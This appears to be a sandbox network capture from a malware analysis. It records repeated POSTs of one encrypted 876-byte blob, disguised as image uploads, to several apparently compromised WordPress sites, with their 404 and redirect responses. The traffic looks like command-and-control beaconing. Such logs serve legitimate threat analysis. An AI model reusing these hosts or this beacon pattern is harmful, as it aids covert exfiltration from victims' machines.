2024-09-09 10:07:24 UTC	3358	IN	Data Raw: 6f 62 73 6f 6c c3 a8 74 65 2e 2e 2e 3c 2f 73 74 72 6f 6e 67 3e 0a 09 09 09 3c 70 3e 50 6f 75 72 20 72 65 6d c3 a9 64 69 65 72 20 c3 a0 20 63 65 20 70 72 6f 62 6c c3 a8 6d 65 2c 20 6e 6f 75 73 20 76 6f 75 73 20 69 6e 76 69 74 6f 6e 73 20 c3 a0 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 6d 65 74 74 72 65 20 c3 a0 20 6a 6f 75 72 20 76 6f 74 72 65 20 6e 61 76 69 67 61 74 65 75 72 3c 2f 61 3e 2e 3c 2f 70 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 73 73 61 67 65 73 2d 63 6f 6d 70 61 74 69 62 69 6c 69 74 69 65 73 2d 63 6f 6e 74 65 6e 74 20 6d 65 73 73 61 67 65 73 2d 63 6f Data Ascii: obsolte...</strong><p>Pour remdier ce problme, nous vous invitons <a href="http://browsehappy.com/" rel="nofollow" target="_blank">mettre jour votre navigateur</a>.</p></div><div class="messages-compatibilities-content messages-co
2024-09-09 10:07:24 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-09-09 10:07:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:24 UTC	281	OUT	POST /data/game/mfkyhvlfokmitv.png HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 876 Host: bayshoreelite.com
2024-09-09 10:07:24 UTC	876	OUT	Data Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23 Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e\|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
2024-09-09 10:07:25 UTC	739	IN	HTTP/1.1 404 Not Found Date: Mon, 09 Sep 2024 10:07:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, must-revalidate, max-age=0 content-security-policy: upgrade-insecure-requests expires: Wed, 11 Jan 1984 05:00:00 GMT link: <https://bayshoreelite.com/wp-json/>; rel="https://api.w.org/" strict-transport-security: max-age=300 strict-transport-security: max-age=31536000; includeSubDomains x-cacheproxy-retries: 0/2 x-content-type-options: nosniff x-fawn-proc-count: 1,0,24 x-php-version: 7.4 x-xss-protection: 1; mode=block x-backend: varnish_ssl CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c065f050cc80c7e-EWR alt-svc: h3=":443"; ma=86400
2024-09-09 10:07:25 UTC	630	IN	Data Raw: 33 65 34 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 Data Ascii: 3e49<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US"><head profile="http://gmpg.org/xfn/11"><meta http-eq
2024-09-09 10:07:25 UTC	1369	IN	Data Raw: 70 74 20 7b 20 62 6f 74 74 6f 6d 3a 20 30 3b 20 7d 0a 09 09 09 2e 73 6c 69 64 65 2d 65 78 63 65 72 70 74 20 7b 20 72 69 67 68 74 3a 20 30 3b 20 7d 0a 09 09 09 64 69 76 2e 73 6c 69 64 65 72 2d 6e 65 78 74 2c 20 64 69 76 2e 73 6c 69 64 65 72 2d 70 72 65 76 69 6f 75 73 20 7b 20 74 6f 70 3a 20 31 37 30 70 78 3b 20 7d 0a 09 09 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 42 61 79 73 68 6f 72 65 20 45 6c 69 74 65 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 61 79 73 68 6f 72 65 65 6c 69 74 65 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 Data Ascii: pt { bottom: 0; }.slide-excerpt { right: 0; }div.slider-next, div.slider-previous { top: 170px; }</style><link rel="alternate" type="application/rss+xml" title="Bayshore Elite » Feed" href="https://bayshoreelite.com/feed/" /><link rel="a
2024-09-09 10:07:25 UTC	1369	IN	Data Raw: 63 5c 75 64 66 66 33 5c 75 66 65 30 66 5c 75 32 30 30 62 5c 75 32 36 61 37 5c 75 66 65 30 66 22 29 3f 21 31 3a 21 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 64 38 33 63 5c 75 64 64 66 33 22 2c 22 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 32 30 30 62 5c 75 64 38 33 63 5c 75 64 64 66 33 22 29 26 26 21 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 64 62 34 30 5c 75 64 63 36 65 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 64 62 34 30 5c 75 64 63 37 66 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 Data Ascii: c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb
2024-09-09 10:07:25 UTC	1369	IN	Data Raw: 4f 62 6a 65 63 74 55 52 4c 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 42 6c 6f 62 29 74 72 79 7b 76 61 72 20 65 3d 22 70 6f 73 74 4d 65 73 73 61 67 65 28 22 2b 66 2e 74 6f 53 74 72 69 6e 67 28 29 2b 22 28 22 2b 5b 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 73 29 2c 75 2e 74 6f 53 74 72 69 6e 67 28 29 2c 70 2e 74 6f 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 Data Ascii: ObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return v
2024-09-09 10:07:25 UTC	1369	IN	Data Raw: 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 70 61 64 64 69 6e 67 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 62 61 79 73 68 6f 72 65 65 6c 69 74 65 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 64 69 73 74 2f 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 36 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 Data Ascii: align: -0.1em !important;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='https://bayshoreelite.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1' type='text/css' medi
2024-09-09 10:07:25 UTC	1369	IN	Data Raw: 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 30 36 39 33 65 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 23 39 62 35 31 65 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 Data Ascii: pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradi
2024-09-09 10:07:25 UTC	1369	IN	Data Raw: 35 2c 32 30 33 29 20 30 25 2c 72 67 62 28 31 38 32 2c 32 32 37 2c 32 31 32 29 20 35 30 25 2c 72 67 62 28 35 31 2c 31 36 37 2c 31 38 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 2c 33 2c 31 32 39 29 20 30 25 2c 72 67 62 28 34 30 2c 31 31 36 2c 32 35 32 29 20 31 30 30 25 29 3b 2d Data Ascii: 5,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);-
2024-09-09 10:07:25 UTC	1369	IN	Data Raw: 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 31 2e 32 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 31 2e 32 35 65 6d 3b 7d 2e 68 61 73 2d 62 6c 61 63 6b 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 Data Ascii: where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-blu

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:25 UTC	268	OUT	POST /admin/graphic/qhok.jpg HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 876 Host: mursall.de
2024-09-09 10:07:25 UTC	876	OUT	Data Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23 Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e\|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
2024-09-09 10:07:27 UTC	1007	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 09 Sep 2024 10:07:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.23 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 x-frame-options: deny x-xss-protection: 1; mode=block x-content-type-options: nosniff strict-transport-security: max-age=31536000; includeSubDomains referrer-policy: no-referrer permissions-policy: accelerometer=(); ambient-light-sensor=(); autoplay=(self); camera=(); encrypted-media=(); fullscreen; geolocation=(self); gyroscope=(); magnetometer=(); microphone=(); midi=(); payment=(); picture-in-picture=(self); speaker=(); usb=(); vr=() content-security-policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' https: data: *.mursall.de; WPO-Cache-Status: not cached WPO-Cache-Message: The request method was not GET (POST) Link: <https://mursall.de/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding
2024-09-09 10:07:27 UTC	15377	IN	Data Raw: 31 63 32 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e Data Ascii: 1c2c<!DOCTYPE html>...[if !(IE 6) \| !(IE 7) \| !(IE 8) ]>...><html lang="de-DE" class="no-js">...<![endif]--><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0">

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:28 UTC	277	OUT	POST /include/tmp/vzac.jpg HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 876 Host: testitjavertailut.net
2024-09-09 10:07:28 UTC	876	OUT	Data Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23 Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e\|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
2024-09-09 10:07:29 UTC	665	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 09 Sep 2024 10:07:29 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Mon, 09 Sep 2024 11:07:29 GMT Location: https://princebet88.site/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T2nAcf%2BrQU2EZgCbU92nK8gvhuL31Qho01XGTIt%2BL%2BKVqHnVL%2BkYtNY794Co37BkAJI235Ho8mTlvJKUPPluPQ5VXn%2F41QYrp2UfQjpG1WyQ4yiXuc%2FG%2B%2FUxM1utT3XelWm6uSe6pO8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c065f1eba8d726e-EWR alt-svc: h3=":443"; ma=86400
2024-09-09 10:07:29 UTC	167	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:29 UTC	190	OUT	GET / HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Host: princebet88.site
2024-09-09 10:07:30 UTC	661	IN	HTTP/1.1 200 OK Date: Mon, 09 Sep 2024 10:07:30 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close last-modified: Thu, 25 Apr 2024 18:01:22 GMT vary: Accept-Encoding x-turbo-charged-by: LiteSpeed CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hCHCXFiK%2BThuDc11%2BVhGhKNX%2BkyHtpK4MvPY%2B97Z5gxUxIbCevZELrg8ah2qfnSzns5MHV7jA0EsNh5f1CHGSXeZIacNfI3E3%2FC38iPX3ZSQu2G0Q5hQpncSOlEiqvGvRYnX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c065f22acc5190e-EWR alt-svc: h3=":443"; ma=86400
2024-09-09 10:07:30 UTC	708	IN	Data Raw: 37 64 31 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 32 30 30 38 2f 66 62 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 20 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 Data Ascii: 7d1b<!doctype html><html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" lang="en-US" > <head><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="viewport" content="width=devic
2024-09-09 10:07:30 UTC	1369	IN	Data Raw: 22 70 72 69 6e 63 65 62 65 74 38 38 2c 20 70 72 69 6e 63 65 62 65 74 38 38 20 6c 6f 67 69 6e 2c 20 70 72 69 6e 63 65 62 65 74 38 38 20 73 6c 6f 74 2c 20 70 72 69 6e 63 65 62 65 74 38 38 20 73 6c 6f 74 20 6c 6f 67 69 6e 2c 20 6c 69 6e 6b 20 61 6c 74 65 72 6e 61 74 69 66 20 70 72 69 6e 63 65 62 65 74 38 38 22 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 41 63 63 65 70 74 2d 43 48 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 72 69 6e 63 65 62 65 74 38 38 Data Ascii: "princebet88, princebet88 login, princebet88 slot, princebet88 slot login, link alternatif princebet88"><meta http-equiv="Accept-CH" content="Sec-CH-UA-Platform-Version, Sec-CH-UA-Model" /><link rel="icon" type="image/x-icon" href="https://princebet88
2024-09-09 10:07:30 UTC	1369	IN	Data Raw: 3a 6f 72 69 67 69 6e 61 6c 5f 70 72 69 63 65 3a 63 75 72 72 65 6e 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 49 44 52 22 2f 3e 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 70 72 6f 64 75 63 74 3a 73 61 6c 65 5f 70 72 69 63 65 3a 61 6d 6f 75 6e 74 22 20 63 6f 6e 74 65 6e 74 3d 22 31 30 30 30 30 2e 30 30 22 2f 3e 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 70 72 6f 64 75 63 74 3a 73 61 6c 65 5f 70 72 69 63 65 3a 63 75 72 72 65 6e 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 49 44 52 22 2f 3e 0d 0a 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 52 49 4e 43 45 42 45 54 38 38 20 23 20 53 65 6c 61 6d 61 74 